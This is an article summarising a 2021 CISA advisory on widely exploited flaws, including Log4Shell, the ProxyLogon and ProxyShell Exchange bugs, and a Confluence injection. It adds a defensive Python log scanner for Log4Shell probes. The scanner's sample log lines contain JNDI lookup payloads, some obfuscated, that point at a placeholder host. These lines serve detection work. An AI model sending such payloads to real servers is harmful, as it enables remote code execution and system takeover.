Which were the most routinely exploited security vulnerabilities in 2021?
CISA, in cooperation with the cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom, has released a joint advisory listing the vulnerabilities most routinely exploited in cyberattacks during 2021.
So, what does the advisory say?
The Most Exploited Vulnerabilities in 2021
Last year, on a global scale, threat actors mainly targeted internet-facing systems, including email servers and VPN (virtual private network) servers, using newly disclosed security flaws. It is noteworthy that, for most of the top exploited bugs, researchers or other actors released proof-of-concept (PoC) code within two weeks of the vulnerability's disclosure, which facilitates exploitation by a broader range of threat actors, CISA noted.
Threat actors also continued to leverage publicly known, older software flaws, some of which were already being exploited in 2020 and previous years. The continued exploitation of older vulnerabilities shows the ongoing risk to organizations that fail to patch their software products; running software that a vendor no longer supports carries the same risk.
The list of these vulnerabilities includes the following:
CVE-2021-44228, or the Log4Shell Exploit
CVE-2021-44228, the so-called Log4Shell exploit, affects Apache's Log4j library, an open-source logging framework. Attackers can exploit the issue by sending a specially crafted request to an exposed system, leading to arbitrary code execution and full system takeover. Once this is achieved, the threat actor can steal information, launch ransomware, or carry out other malicious activities. Log4Shell was disclosed in December 2021, but its rapid and widespread exploitation demonstrates how quickly threat actors can weaponize known flaws and target organizations before they patch, CISA noted.
It is noteworthy that the exploit was leveraged by the Khonsari ransomware family in attacks against Windows servers. The same attacks also downloaded an additional malicious payload, the Orcus remote access trojan.
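As an added example (not part of the advisory or this article), the following Python scanner flags web-server log lines that carry the Log4j lookup string the exploit relies on, including URL-encoded and nested-lookup obfuscations that simple string matching misses. The log lines are constructed for the example, and 198.51.100.7 is a documentation-range placeholder address.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested "${" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(m):
    """Collapse one Log4j lookup used purely for obfuscation; keep the rest."""
    body = m.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()          # ${lower:J} -> "j"
    if sep and head.lower() == "upper":
        return rest.upper()          # ${upper:n} -> "N"
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${::-j} or ${env:UNSET:-j} -> "j"
    return m.group(0)                # e.g. ${jndi:...} stays visible for matching

def normalize(text, max_rounds=20):
    """Undo URL encoding and nested lookup tricks so the jndi key is visible."""
    for _ in range(2):               # handles single and double encoding
        text = unquote(text)
    for _ in range(max_rounds):      # bounded: resolves innermost lookups first
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def looks_like_log4shell_probe(line):
    return "${jndi:" in normalize(line).lower()

def find_probes(lines):
    """Return the original log lines whose normalized form carries a jndi lookup."""
    return [line for line in lines if looks_like_log4shell_probe(line)]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:ldap://198.51.100.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:03:40 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.2 - - [10/Dec/2021:10:04:00 +0000] "GET /?msg=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print("ALERT:", hit)
```

Normalizing before matching is what catches the second and third probes; a plain search for `${jndi:` would miss both.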
The ProxyLogon Vulnerabilities
These vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. They affect Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019.
The flaws have been used together as an attack chain. To initiate the attack, an adversary needs an untrusted connection to the Exchange server on port 443. This entry point can be mitigated by restricting untrusted connections, or by placing the server behind a VPN to separate it from external access. However, these mitigations offer only partial protection: Microsoft warns that other parts of the attack chain can still be triggered if an attacker already has access or can convince an administrator to run a malicious file.
The ProxyShell Exploit
CISA released an alert last August warning that cybercriminals were exploiting the so-called ProxyShell Microsoft Exchange vulnerabilities, known as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Successful exploitation enables remote threat actors to perform arbitrary code execution. “These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers,” CISA noted.
The Critical Atlassian Confluence Flaw
CVE-2021-26084 is a vulnerability in Atlassian Confluence deployments on both Windows and Linux. The flaw is rated critical and has been exploited to deploy web shells that in turn run cryptocurrency miners on vulnerable systems. The issue is an Object-Graph Navigation Language (OGNL) injection in the Webwork module of Atlassian Confluence Server and Data Center. Remote attackers can trigger it by sending a crafted HTTP request with a malicious parameter to a vulnerable server, which can lead to arbitrary code execution "in the security context of the affected server," as Trend Micro researchers pointed out upon disclosure.
“Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors,” CISA’s advisory said.